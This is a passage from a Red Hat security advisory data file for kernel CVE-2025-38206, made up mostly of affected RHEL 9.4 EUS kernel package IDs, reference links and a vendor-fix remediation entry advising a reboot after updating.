"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38206"
},
{
"category": "external",
"summary": "RHBZ#2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T"
}
],
"release_date": "2025-07-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-11T01:14:40+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
